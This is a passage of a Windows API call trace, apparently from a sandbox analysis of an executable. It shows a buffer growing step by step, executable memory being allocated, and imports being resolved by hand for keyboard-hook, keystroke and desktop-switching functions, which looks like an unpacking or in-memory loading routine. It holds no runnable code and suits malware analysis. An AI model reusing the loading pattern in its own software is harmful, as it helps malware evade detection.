uFlags=0x2) returned 0xb40084 [0037.757] GlobalLock (hMem=0xb40084) returned 0x6e00020 [0037.758] GlobalHandle (pMem=0x6e00020) returned 0xb40084 [0037.758] GlobalUnlock (hMem=0xb40084) returned 0 [0037.758] GlobalReAlloc (hMem=0xb40084, dwBytes=0x262000, uFlags=0x2) returned 0xb40084 [0037.809] GlobalLock (hMem=0xb40084) returned 0x7070020 [0037.810] GlobalHandle (pMem=0x7070020) returned 0xb40084 [0037.810] GlobalUnlock (hMem=0xb40084) returned 0 [0037.810] GlobalReAlloc (hMem=0xb40084, dwBytes=0x264000, uFlags=0x2) returned 0xb40084 [0037.863] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0037.864] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0037.864] GlobalUnlock (hMem=0xb40084) returned 0 [0037.864] GlobalReAlloc (hMem=0xb40084, dwBytes=0x266000, uFlags=0x2) returned 0xb40084 [0037.913] GlobalLock (hMem=0xb40084) returned 0x6e10020 [0037.914] GlobalHandle (pMem=0x6e10020) returned 0xb40084 [0037.914] GlobalUnlock (hMem=0xb40084) returned 0 [0037.914] GlobalReAlloc (hMem=0xb40084, dwBytes=0x268000, uFlags=0x2) returned 0xb40084 [0038.024] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.025] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.025] GlobalUnlock (hMem=0xb40084) returned 0 [0038.025] GlobalReAlloc (hMem=0xb40084, dwBytes=0x26a000, uFlags=0x2) returned 0xb40084 [0038.075] GlobalLock (hMem=0xb40084) returned 0x6e10020 [0038.076] GlobalHandle (pMem=0x6e10020) returned 0xb40084 [0038.076] GlobalUnlock (hMem=0xb40084) returned 0 [0038.076] GlobalReAlloc (hMem=0xb40084, dwBytes=0x26c000, uFlags=0x2) returned 0xb40084 [0038.123] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.124] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.124] GlobalUnlock (hMem=0xb40084) returned 0 [0038.124] GlobalReAlloc (hMem=0xb40084, dwBytes=0x26e000, uFlags=0x2) returned 0xb40084 [0038.172] GlobalLock (hMem=0xb40084) returned 0x6e10020 [0038.173] GlobalHandle (pMem=0x6e10020) returned 0xb40084 [0038.173] GlobalUnlock (hMem=0xb40084) returned 0 [0038.173] GlobalReAlloc (hMem=0xb40084, dwBytes=0x270000, uFlags=0x2) returned 0xb40084 [0038.221] GlobalLock (hMem=0xb40084) returned 0x7080020 [0038.222] GlobalHandle (pMem=0x7080020) returned 0xb40084 [0038.222] GlobalUnlock (hMem=0xb40084) returned 0 [0038.222] GlobalReAlloc (hMem=0xb40084, dwBytes=0x272000, uFlags=0x2) returned 0xb40084 [0038.270] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.271] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.271] GlobalUnlock (hMem=0xb40084) returned 0 [0038.271] GlobalReAlloc (hMem=0xb40084, dwBytes=0x274000, uFlags=0x2) returned 0xb40084 [0038.319] GlobalLock (hMem=0xb40084) returned 0x6e20020 [0038.320] GlobalHandle (pMem=0x6e20020) returned 0xb40084 [0038.320] GlobalUnlock (hMem=0xb40084) returned 0 [0038.320] GlobalReAlloc (hMem=0xb40084, dwBytes=0x276000, uFlags=0x2) returned 0xb40084 [0038.367] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.368] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.368] GlobalUnlock (hMem=0xb40084) returned 0 [0038.368] GlobalReAlloc (hMem=0xb40084, dwBytes=0x278000, uFlags=0x2) returned 0xb40084 [0038.416] GlobalLock (hMem=0xb40084) returned 0x6e20020 [0038.417] GlobalHandle (pMem=0x6e20020) returned 0xb40084 [0038.417] GlobalUnlock (hMem=0xb40084) returned 0 [0038.417] GlobalReAlloc (hMem=0xb40084, dwBytes=0x27a000, uFlags=0x2) returned 0xb40084 [0038.487] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.489] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.489] GlobalUnlock (hMem=0xb40084) returned 0 [0038.489] GlobalReAlloc (hMem=0xb40084, dwBytes=0x27c000, uFlags=0x2) returned 0xb40084 [0038.537] GlobalLock (hMem=0xb40084) returned 0x6e20020 [0038.538] GlobalHandle (pMem=0x6e20020) returned 0xb40084 [0038.538] GlobalUnlock (hMem=0xb40084) returned 0 [0038.538] GlobalReAlloc (hMem=0xb40084, dwBytes=0x27e000, uFlags=0x2) returned 0xb40084 [0038.587] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.591] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.591] GlobalUnlock (hMem=0xb40084) returned 0 [0038.591] GlobalReAlloc (hMem=0xb40084, dwBytes=0x280000, uFlags=0x2) returned 0xb40084 [0038.639] GlobalLock (hMem=0xb40084) returned 0x6e20020 [0038.640] GlobalHandle (pMem=0x6e20020) returned 0xb40084 [0038.640] GlobalUnlock (hMem=0xb40084) returned 0 [0038.640] GlobalReAlloc (hMem=0xb40084, dwBytes=0x282000, uFlags=0x2) returned 0xb40084 [0038.691] GlobalLock (hMem=0xb40084) returned 0x70b0020 [0038.692] GlobalHandle (pMem=0x70b0020) returned 0xb40084 [0038.692] GlobalUnlock (hMem=0xb40084) returned 0 [0038.692] GlobalReAlloc (hMem=0xb40084, dwBytes=0x284000, uFlags=0x2) returned 0xb40084 [0038.741] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.742] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.742] GlobalUnlock (hMem=0xb40084) returned 0 [0038.742] GlobalReAlloc (hMem=0xb40084, dwBytes=0x286000, uFlags=0x2) returned 0xb40084 [0038.792] GlobalLock (hMem=0xb40084) returned 0x6e30020 [0038.793] GlobalHandle (pMem=0x6e30020) returned 0xb40084 [0038.793] GlobalUnlock (hMem=0xb40084) returned 0 [0038.793] GlobalReAlloc (hMem=0xb40084, dwBytes=0x288000, uFlags=0x2) returned 0xb40084 [0038.843] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.844] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.844] GlobalUnlock (hMem=0xb40084) returned 0 [0038.844] GlobalReAlloc (hMem=0xb40084, dwBytes=0x28a000, uFlags=0x2) returned 0xb40084 [0038.893] GlobalLock (hMem=0xb40084) returned 0x6e30020 [0038.894] GlobalHandle (pMem=0x6e30020) returned 0xb40084 [0038.894] GlobalUnlock (hMem=0xb40084) returned 0 [0038.894] GlobalReAlloc (hMem=0xb40084, dwBytes=0x28c000, uFlags=0x2) returned 0xb40084 [0038.943] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0038.944] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0038.944] GlobalUnlock (hMem=0xb40084) returned 0 [0038.944] GlobalReAlloc (hMem=0xb40084, dwBytes=0x28e000, uFlags=0x2) returned 0xb40084 [0038.994] GlobalLock (hMem=0xb40084) returned 0x6e30020 [0038.995] GlobalHandle (pMem=0x6e30020) returned 0xb40084 [0038.995] GlobalUnlock (hMem=0xb40084) returned 0 [0038.995] GlobalReAlloc (hMem=0xb40084, dwBytes=0x290000, uFlags=0x2) returned 0xb40084 [0039.045] GlobalLock (hMem=0xb40084) returned 0x70c0020 [0039.046] GlobalHandle (pMem=0x70c0020) returned 0xb40084 [0039.046] GlobalUnlock (hMem=0xb40084) returned 0 [0039.046] GlobalReAlloc (hMem=0xb40084, dwBytes=0x292000, uFlags=0x2) returned 0xb40084 [0039.095] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0039.096] VirtualAlloc (lpAddress=0x0, dwSize=0x2a0000, flAllocationType=0x2000, flProtect=0x1) returned 0x6e40000 [0039.096] VirtualAlloc (lpAddress=0x6e40000, dwSize=0x294000, flAllocationType=0x1000, flProtect=0x4) returned 0x6e40000 [0039.143] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0039.143] GlobalUnlock (hMem=0xb40084) returned 0 [0039.161] VirtualAlloc (lpAddress=0x400000, dwSize=0x29c000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0039.161] VirtualAlloc (lpAddress=0x0, dwSize=0x29c000, flAllocationType=0x2000, flProtect=0x4) returned 0x6ba0000 [0039.161] VirtualAlloc (lpAddress=0x6ba0000, dwSize=0x29c000, flAllocationType=0x1000, flProtect=0x4) returned 0x6ba0000 [0039.170] VirtualAlloc (lpAddress=0x6ba0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x6ba0000 [0039.170] VirtualAlloc (lpAddress=0x6ba1000, dwSize=0x23d400, flAllocationType=0x1000, flProtect=0x40) returned 0x6ba1000 [0039.213] VirtualAlloc (lpAddress=0x6ddf000, dwSize=0x2200, flAllocationType=0x1000, flProtect=0x40) returned 0x6ddf000 [0039.213] VirtualAlloc (lpAddress=0x6de2000, dwSize=0xb400, flAllocationType=0x1000, flProtect=0x40) returned 0x6de2000 [0039.214] VirtualAlloc (lpAddress=0x6dee000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x6dee000 [0039.214] VirtualAlloc (lpAddress=0x6df4000, dwSize=0x3800, flAllocationType=0x1000, flProtect=0x40) returned 0x6df4000 [0039.215] VirtualAlloc (lpAddress=0x6df8000, dwSize=0xa00, flAllocationType=0x1000, flProtect=0x40) returned 0x6df8000 [0039.215] VirtualAlloc (lpAddress=0x6df9000, dwSize=0x34600, flAllocationType=0x1000, flProtect=0x40) returned 0x6df9000 [0039.219] VirtualAlloc (lpAddress=0x6e2e000, dwSize=0xd400, flAllocationType=0x1000, flProtect=0x40) returned 0x6e2e000 [0039.222] IsBadReadPtr (lp=0x6df4000, ucb=0x14) returned 0 [0039.222] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76ee0000 [0039.223] GetProcAddress (hModule=0x76ee0000, lpProcName="SysFreeString") returned 0x76ee3e59 [0039.224] GetProcAddress (hModule=0x76ee0000, lpProcName="SysReAllocStringLen") returned 0x76ee7810 [0039.224] GetProcAddress (hModule=0x76ee0000, lpProcName="SysAllocStringLen") returned 0x76ee45d2 [0039.224] IsBadReadPtr (lp=0x6df4014, ucb=0x14) returned 0 [0039.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76650000 [0039.225] GetProcAddress (hModule=0x76650000, lpProcName="RegQueryValueExW") returned 0x766646ad [0039.225] GetProcAddress (hModule=0x76650000, lpProcName="RegOpenKeyExW") returned 0x7666468d [0039.226] GetProcAddress (hModule=0x76650000, lpProcName="RegCloseKey") returned 0x7666469d [0039.226] IsBadReadPtr (lp=0x6df4028, ucb=0x14) returned 0 [0039.226] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76ca0000 [0039.227] GetProcAddress (hModule=0x76ca0000, lpProcName="MessageBoxA") returned 0x76cfea11 [0039.227] GetProcAddress (hModule=0x76ca0000, lpProcName="CharNextW") returned 0x76cb0be6 [0039.228] GetProcAddress (hModule=0x76ca0000, lpProcName="LoadStringW") returned 0x76cadfba [0039.228] IsBadReadPtr (lp=0x6df403c, ucb=0x14) returned 0 [0039.228] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0039.229] GetProcAddress (hModule=0x75900000, lpProcName="Sleep") returned 0x7594ba46 [0039.229] GetProcAddress (hModule=0x75900000, lpProcName="VirtualFree") returned 0x75951da4 [0039.230] GetProcAddress (hModule=0x75900000, lpProcName="VirtualAlloc") returned 0x75952fb6 [0039.230] GetProcAddress (hModule=0x75900000, lpProcName="lstrlenW") returned 0x7594d9e8 [0039.231] GetProcAddress (hModule=0x75900000, lpProcName="VirtualQuery") returned 0x759576d6 [0039.231] GetProcAddress (hModule=0x75900000, lpProcName="QueryPerformanceCounter") returned 0x7594bb9f [0039.231] GetProcAddress (hModule=0x75900000, lpProcName="GetTickCount") returned 0x7594ba60 [0039.232] GetProcAddress (hModule=0x75900000, lpProcName="GetSystemInfo") returned 0x75953728 [0039.232] GetProcAddress (hModule=0x75900000, lpProcName="GetVersion") returned 0x7594154e [0039.233] GetProcAddress (hModule=0x75900000, lpProcName="CompareStringW") returned 0x75949bee [0039.233] GetProcAddress (hModule=0x75900000, lpProcName="IsValidLocale") returned 0x75943de4 [0039.234] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadLocale") returned 0x759688e6 [0039.234] GetProcAddress (hModule=0x75900000, lpProcName="GetSystemDefaultUILanguage") returned 0x7593731d [0039.235] GetProcAddress (hModule=0x75900000, lpProcName="GetUserDefaultUILanguage") returned 0x759422ef [0039.235] GetProcAddress (hModule=0x75900000, lpProcName="GetLocaleInfoW") returned 0x75956596 [0039.236] GetProcAddress (hModule=0x75900000, lpProcName="WideCharToMultiByte") returned 0x7595450e [0039.236] GetProcAddress (hModule=0x75900000, lpProcName="MultiByteToWideChar") returned 0x7595452b [0039.237] GetProcAddress (hModule=0x75900000, lpProcName="GetACP") returned 0x759539aa [0039.237] GetProcAddress (hModule=0x75900000, lpProcName="LoadLibraryExW") returned 0x75944775 [0039.238] GetProcAddress (hModule=0x75900000, lpProcName="GetStartupInfoW") returned 0x75953891 [0039.238] GetProcAddress (hModule=0x75900000, lpProcName="GetProcAddress") returned 0x759533d3 [0039.238] GetProcAddress (hModule=0x75900000, lpProcName="GetModuleHandleW") returned 0x7595374d [0039.239] GetProcAddress (hModule=0x75900000, lpProcName="GetModuleFileNameW") returned 0x75953c26 [0039.239] GetProcAddress (hModule=0x75900000, lpProcName="GetCommandLineW") returned 0x7595679e [0039.240] GetProcAddress (hModule=0x75900000, lpProcName="FreeLibrary") returned 0x7594d9d0 [0039.240] GetProcAddress (hModule=0x75900000, lpProcName="GetLastError") returned 0x7594bf00 [0039.241] GetProcAddress (hModule=0x75900000, lpProcName="UnhandledExceptionFilter") returned 0x7595ed38 [0039.241] GetProcAddress (hModule=0x75900000, lpProcName="RtlUnwind") returned 0x75937f70 [0039.242] GetProcAddress (hModule=0x75900000, lpProcName="RaiseException") returned 0x7593eb60 [0039.242] GetProcAddress (hModule=0x75900000, lpProcName="ExitProcess") returned 0x7595214f [0039.243] GetProcAddress (hModule=0x75900000, lpProcName="ExitThread") returned 0x7722f611 [0039.243] GetProcAddress (hModule=0x75900000, lpProcName="SwitchToThread") returned 0x7593eb24 [0039.244] GetProcAddress (hModule=0x75900000, lpProcName="GetCurrentThreadId") returned 0x7594bb80 [0039.244] GetProcAddress (hModule=0x75900000, lpProcName="CreateThread") returned 0x7595375d [0039.245] GetProcAddress (hModule=0x75900000, lpProcName="DeleteCriticalSection") returned 0x77259ac5 [0039.245] GetProcAddress (hModule=0x75900000, lpProcName="LeaveCriticalSection") returned 0x77247760 [0039.246] GetProcAddress (hModule=0x75900000, lpProcName="EnterCriticalSection") returned 0x772477a0 [0039.246] GetProcAddress (hModule=0x75900000, lpProcName="InitializeCriticalSection") returned 0x7725a149 [0039.247] GetProcAddress (hModule=0x75900000, lpProcName="FindFirstFileW") returned 0x759553b2 [0039.247] GetProcAddress (hModule=0x75900000, lpProcName="FindClose") returned 0x75950e62 [0039.248] GetProcAddress (hModule=0x75900000, lpProcName="WriteFile") returned 0x75951400 [0039.248] GetProcAddress (hModule=0x75900000, lpProcName="GetStdHandle") returned 0x75951e46 [0039.248] GetProcAddress (hModule=0x75900000, lpProcName="CloseHandle") returned 0x7594ca7c [0039.248] IsBadReadPtr (lp=0x6df4050, ucb=0x14) returned 0 [0039.249] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0039.249] GetProcAddress (hModule=0x75900000, lpProcName="GetProcAddress") returned 0x759533d3 [0039.250] GetProcAddress (hModule=0x75900000, lpProcName="RaiseException") returned 0x7593eb60 [0039.250] GetProcAddress (hModule=0x75900000, lpProcName="LoadLibraryA") returned 0x7595395c [0039.251] GetProcAddress (hModule=0x75900000, lpProcName="GetLastError") returned 0x7594bf00 [0039.251] GetProcAddress (hModule=0x75900000, lpProcName="TlsSetValue") returned 0x7594da88 [0039.252] GetProcAddress (hModule=0x75900000, lpProcName="TlsGetValue") returned 0x7594da70 [0039.252] GetProcAddress (hModule=0x75900000, lpProcName="TlsFree") returned 0x759513b8 [0039.253] GetProcAddress (hModule=0x75900000, lpProcName="TlsAlloc") returned 0x759535a1 [0039.253] GetProcAddress (hModule=0x75900000, lpProcName="LocalFree") returned 0x7594ca64 [0039.254] GetProcAddress (hModule=0x75900000, lpProcName="LocalAlloc") returned 0x75953363 [0039.254] GetProcAddress (hModule=0x75900000, lpProcName="FreeLibrary") returned 0x7594d9d0 [0039.254] IsBadReadPtr (lp=0x6df4064, ucb=0x14) returned 0 [0039.254] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76ca0000 [0039.255] GetProcAddress (hModule=0x76ca0000, lpProcName="SetClassLongW") returned 0x76ca658b [0039.255] GetProcAddress (hModule=0x76ca0000, lpProcName="GetClassLongW") returned 0x76cb3860 [0039.256] GetProcAddress (hModule=0x76ca0000, lpProcName="SetWindowLongW") returned 0x76cb4449 [0039.256] GetProcAddress (hModule=0x76ca0000, lpProcName="GetWindowLongW") returned 0x76cb61b8 [0039.256] GetProcAddress (hModule=0x76ca0000, lpProcName="CreateWindowExW") returned 0x76caec7c [0039.257] GetProcAddress (hModule=0x76ca0000, lpProcName="keybd_event") returned 0x76cfec3b [0039.257] GetProcAddress (hModule=0x76ca0000, lpProcName="WindowFromPoint") returned 0x76cd6be9 [0039.258] GetProcAddress (hModule=0x76ca0000, lpProcName="WaitMessage") returned 0x76cb66bd [0039.258] GetProcAddress (hModule=0x76ca0000, lpProcName="WaitForInputIdle") returned 0x76cd0397 [0039.259] GetProcAddress (hModule=0x76ca0000, lpProcName="UpdateWindow") returned 0x76caffa8 [0039.259] GetProcAddress (hModule=0x76ca0000, lpProcName="UnregisterClassW") returned 0x76cab9ae [0039.260] GetProcAddress (hModule=0x76ca0000, lpProcName="UnhookWindowsHookEx") returned 0x76caadf9 [0039.260] GetProcAddress (hModule=0x76ca0000, lpProcName="TranslateMessage") returned 0x76cb64c7 [0039.261] GetProcAddress (hModule=0x76ca0000, lpProcName="TranslateMDISysAccel") returned 0x76cd1a5a [0039.261] GetProcAddress (hModule=0x76ca0000, lpProcName="TrackPopupMenu") returned 0x76cc2228 [0039.261] GetProcAddress (hModule=0x76ca0000, lpProcName="SystemParametersInfoW") returned 0x76cae09a [0039.262] GetProcAddress (hModule=0x76ca0000, lpProcName="SwitchDesktop") returned 0x76ca476b [0039.262] GetProcAddress (hModule=0x76ca0000, lpProcName="ShowWindow") returned 0x76caf2a9 [0039.263] GetProcAddress (hModule=0x76ca0000, lpProcName="ShowScrollBar") returned 0x76cd3c89 [0039.263] GetProcAddress (hModule=0x76ca0000, lpProcName="ShowOwnedPopups") returned 0x76cd28ca [0039.264] GetProcAddress (hModule=0x76ca0000, lpProcName="ShowCaret") returned 0x76ca9334 [0039.264] GetProcAddress (hModule=0x76ca0000, lpProcName="SetWindowRgn") returned 0x76ca99ec [0039.265] GetProcAddress (hModule=0x76ca0000, lpProcName="SetWindowsHookExW") returned 0x76cae30c [0039.265] GetProcAddress (hModule=0x76ca0000, lpProcName="SetWindowTextW") returned 0x76cb612b [0039.266] GetProcAddress (hModule=0x76ca0000, lpProcName="SetWindowPos") returned 0x76cb1bc4 [0039.266] GetProcAddress (hModule=0x76ca0000, lpProcName="SetWindowPlacement") returned 0x76ca7f78 [0039.267] GetProcAddress (hModule=0x76ca0000, lpProcName="SetTimer") returned 0x76cb52ef [0039.267] GetProcAddress (hModule=0x76ca0000, lpProcName="SetScrollRange") returned 0x76ca8ec5 [0039.268] GetProcAddress (hModule=0x76ca0000, lpProcName="SetScrollPos") returned 0x76cd04be [0039.268] GetProcAddress (hModule=0x76ca0000, lpProcName="SetScrollInfo") returned 0x76cb48da [0039.269] GetProcAddress (hModule=0x76ca0000, lpProcName="SetRect") returned 0x76cb498b [0039.269] GetProcAddress (hModule=0x76ca0000, lpProcName="SetPropW") returned 0x76cb5dc5 [0039.269] GetProcAddress (hModule=0x76ca0000, lpProcName="SetParent") returned 0x76ca8314 [0039.270] GetProcAddress (hModule=0x76ca0000, lpProcName="SetMenuItemInfoW") returned 0x76cb1799 [0039.270] GetProcAddress (hModule=0x76ca0000, lpProcName="SetMenu") returned 0x76cd6b0e [0039.271] GetProcAddress (hModule=0x76ca0000, lpProcName="SetKeyboardState") returned 0x76cd695a [0039.271] GetProcAddress (hModule=0x76ca0000, lpProcName="SetForegroundWindow") returned 0x76cab225 [0039.272] GetProcAddress (hModule=0x76ca0000, lpProcName="SetFocus") returned 0x76caabad [0039.272] GetProcAddress (hModule=0x76ca0000, lpProcName="SetCursorPos") returned 0x76cec1b0 [0039.273] GetProcAddress (hModule=0x76ca0000, lpProcName="SetCursor") returned 0x76cb3075 [0039.273] GetProcAddress (hModule=0x76ca0000, lpProcName="SetCapture") returned 0x76cd6932 [0039.274] GetProcAddress (hModule=0x76ca0000, lpProcName="SetActiveWindow") returned 0x76cb333a [0039.274] GetProcAddress (hModule=0x76ca0000, lpProcName="SendMessageTimeoutW") returned 0x76cae459 [0039.274] GetProcAddress (hModule=0x76ca0000, lpProcName="SendMessageA") returned 0x76caad60 [0039.275] GetProcAddress (hModule=0x76ca0000, lpProcName="SendMessageW") returned 0x76cb5539 [0039.276] GetProcAddress (hModule=0x76ca0000, lpProcName="ScrollWindow") returned 0x76ccfc1d [0039.276] GetProcAddress (hModule=0x76ca0000, lpProcName="ScreenToClient") returned 0x76caa506 [0039.276] GetProcAddress (hModule=0x76ca0000, lpProcName="RemovePropW") returned 0x76cb5fe1 [0039.277] GetProcAddress (hModule=0x76ca0000, lpProcName="RemoveMenu") returned 0x76ca86e8 [0039.277] GetProcAddress (hModule=0x76ca0000, lpProcName="ReleaseDC") returned 0x76cb5421 [0039.278] GetProcAddress (hModule=0x76ca0000, lpProcName="ReleaseCapture") returned 0x76cd69f2 [0039.278] GetProcAddress (hModule=0x76ca0000, lpProcName="RegisterWindowMessageW") returned 0x76cadf8d [0039.279] GetProcAddress (hModule=0x76ca0000, lpProcName="RegisterClipboardFormatW") returned 0x76cadf8d [0039.279] GetProcAddress (hModule=0x76ca0000, lpProcName="RegisterClassW") returned 0x76caed4a [0039.280] GetProcAddress (hModule=0x76ca0000, lpProcName="RedrawWindow") returned 0x76cb29bc [0039.280] GetProcAddress (hModule=0x76ca0000, lpProcName="PostQuitMessage") returned 0x76cab308 [0039.281] GetProcAddress (hModule=0x76ca0000, lpProcName="PostMessageW") returned 0x76cb447b [0039.281] GetProcAddress (hModule=0x76ca0000, lpProcName="PeekMessageA") returned 0x76cb19a5 [0039.282] GetProcAddress (hModule=0x76ca0000, lpProcName="PeekMessageW") returned 0x76cb634a [0039.282] GetProcAddress (hModule=0x76ca0000, lpProcName="OpenDesktopW") returned 0x76cac669 [0039.283] GetProcAddress (hModule=0x76ca0000, lpProcName="MsgWaitForMultipleObjectsEx") returned 0x76cae369 [0039.283] GetProcAddress (hModule=0x76ca0000, lpProcName="MsgWaitForMultipleObjects") returned 0x76cb37d8 [0039.284] GetProcAddress (hModule=0x76ca0000, lpProcName="MoveWindow") returned 0x76ca8d29 [0039.284] GetProcAddress (hModule=0x76ca0000, lpProcName="MessageBoxW") returned 0x76cfea5f [0039.284] GetProcAddress (hModule=0x76ca0000, lpProcName="MessageBeep") returned 0x76cd2939 [0039.285] GetProcAddress (hModule=0x76ca0000, lpProcName="MapWindowPoints") returned 0x76cb5caa [0039.285] GetProcAddress (hModule=0x76ca0000, lpProcName="MapVirtualKeyW") returned 0x76cd6a7c [0039.286] GetProcAddress (hModule=0x76ca0000, lpProcName="LoadStringW") returned 0x76cadfba [0039.286] GetProcAddress (hModule=0x76ca0000, lpProcName="LoadKeyboardLayoutW") returned 0x76cec874 [0039.286] GetProcAddress (hModule=0x76ca0000, lpProcName="LoadIconW") returned 0x76caf142 [0039.287] GetProcAddress (hModule=0x76ca0000, lpProcName="LoadCursorW") returned 0x76caed90 [0039.287] GetProcAddress (hModule=0x76ca0000, lpProcName="LoadBitmapW") returned 0x76ca6460 [0039.288] GetProcAddress (hModule=0x76ca0000, lpProcName="KillTimer") returned 0x76cb64f7 [0039.288] GetProcAddress (hModule=0x76ca0000, lpProcName="IsZoomed") returned 0x76cb4ce9 [0039.288] GetProcAddress (hModule=0x76ca0000, lpProcName="IsWindowVisible") returned 0x76cb4d69 [0039.289] GetProcAddress (hModule=0x76ca0000, lpProcName="IsWindowUnicode") returned 0x76cb2f55 [0039.289] GetProcAddress (hModule=0x76ca0000, lpProcName="IsWindowEnabled") returned 0x76caa9b9 [0039.290] GetProcAddress (hModule=0x76ca0000, lpProcName="IsWindow") returned 0x76cb53ba [0039.290] GetProcAddress (hModule=0x76ca0000, lpProcName="IsIconic") returned 0x76cb4c8e [0039.291] GetProcAddress (hModule=0x76ca0000, lpProcName="IsDialogMessageA") returned 0x76cc2019 [0039.291] GetProcAddress (hModule=0x76ca0000, lpProcName="IsDialogMessageW") returned 0x76cb4104 [0039.291] GetProcAddress (hModule=0x76ca0000, lpProcName="IsChild") returned 0x76cb3a83 [0039.292] GetProcAddress (hModule=0x76ca0000, lpProcName="InvalidateRect") returned 0x76cb566d [0039.292] GetProcAddress (hModule=0x76ca0000, lpProcName="InsertMenuItemW") returned 0x76caaac5 [0039.293] GetProcAddress (hModule=0x76ca0000, lpProcName="InsertMenuW") returned 0x76ca869a [0039.293] GetProcAddress (hModule=0x76ca0000, lpProcName="HideCaret") returned 0x76ca9348 [0039.294] GetProcAddress (hModule=0x76ca0000, lpProcName="GetWindowThreadProcessId") returned 0x76caee32 [0039.294] GetProcAddress (hModule=0x76ca0000, lpProcName="GetWindowTextW") returned 0x76cab8c5 [0039.295] GetProcAddress (hModule=0x76ca0000, lpProcName="GetWindowRect") returned 0x76cb558c [0039.295] GetProcAddress (hModule=0x76ca0000, lpProcName="GetWindowPlacement") returned 0x76cd69de [0039.296] GetProcAddress (hModule=0x76ca0000, lpProcName="GetWindowDC") returned 0x76cb4ab7 [0039.296] GetProcAddress (hModule=0x76ca0000, lpProcName="GetTopWindow") returned 0x76cd24d9 [0039.296] GetProcAddress (hModule=0x76ca0000, lpProcName="GetSystemMetrics") returned 0x76cb67cf [0039.297] GetProcAddress (hModule=0x76ca0000, lpProcName="GetSystemMenu") returned 0x76cafd8b [0039.297] GetProcAddress (hModule=0x76ca0000, lpProcName="GetSysColorBrush") returned 0x76caf1ed [0039.298] GetProcAddress (hModule=0x76ca0000, lpProcName="GetSysColor") returned 0x76cbdb7a [0039.298] GetProcAddress (hModule=0x76ca0000, lpProcName="GetSubMenu") returned 0x76ca9c19 [0039.299] GetProcAddress (hModule=0x76ca0000, lpProcName="GetScrollRange") returned 0x76cd045a [0039.299] GetProcAddress (hModule=0x76ca0000, lpProcName="GetScrollPos") returned 0x76cd0e43 [0039.300] GetProcAddress (hModule=0x76ca0000, lpProcName="GetScrollInfo") returned 0x76cb2da3 [0039.300] GetProcAddress (hModule=0x76ca0000, lpProcName="GetPropW") returned 0x76cb5bbe [0039.301] GetProcAddress (hModule=0x76ca0000, lpProcName="GetParent") returned 0x76cb6029 [0039.301] GetProcAddress (hModule=0x76ca0000, lpProcName="GetWindow") returned 0x76cb2780 [0039.301] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMessageTime") returned 0x76cd4231 [0039.302] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMessagePos") returned 0x76cd6703 [0039.303] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMessageExtraInfo") returned 0x76cab705 [0039.303] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMenuStringW") returned 0x76cd6528 [0039.303] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMenuState") returned 0x76cd67d2 [0039.304] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMenuItemInfoW") returned 0x76caaefa [0039.304] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMenuItemID") returned 0x76ca9cd4 [0039.305] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMenuItemCount") returned 0x76caae39 [0039.305] GetProcAddress (hModule=0x76ca0000, lpProcName="GetMenu") returned 0x76cd6b68 [0039.306] GetProcAddress (hModule=0x76ca0000, lpProcName="GetLastActivePopup") returned 0x76cd6894 [0039.307] GetProcAddress (hModule=0x76ca0000, lpProcName="GetKeyboardState") returned 0x76cd6946 [0039.307] GetProcAddress (hModule=0x76ca0000, lpProcName="GetKeyboardLayoutNameW") returned 0x76cefa13 [0039.307] GetProcAddress (hModule=0x76ca0000, lpProcName="GetKeyboardLayoutList") returned 0x76ca935c [0039.308] GetProcAddress (hModule=0x76ca0000, lpProcName="GetKeyboardLayout") returned 0x76cb3800 [0039.308] GetProcAddress (hModule=0x76ca0000, lpProcName="GetKeyState") returned 0x76cb2b4d [0039.309] GetProcAddress (hModule=0x76ca0000, lpProcName="GetKeyNameTextW") returned 0x76cefa03 [0039.309] GetProcAddress (hModule=0x76ca0000, lpProcName="GetIconInfo") returned 0x76cb2989 [0039.310] GetProcAddress (hModule=0x76ca0000, lpProcName="GetGUIThreadInfo") returned 0x76cb237e [0039.310] GetProcAddress (hModule=0x76ca0000, lpProcName="GetForegroundWindow") returned 0x76cb335d [0039.311] GetProcAddress (hModule=0x76ca0000, lpProcName="GetFocus") returned 0x76cb3a34 [0039.311] GetProcAddress (hModule=0x76ca0000, lpProcName="GetDlgCtrlID") returned 0x76cab4e8 [0039.312] GetProcAddress (hModule=0x76ca0000, lpProcName="GetDesktopWindow") returned 0x76cb01a9 [0039.312] GetProcAddress (hModule=0x76ca0000, lpProcName="GetDCEx") returned 0x76cb2d57 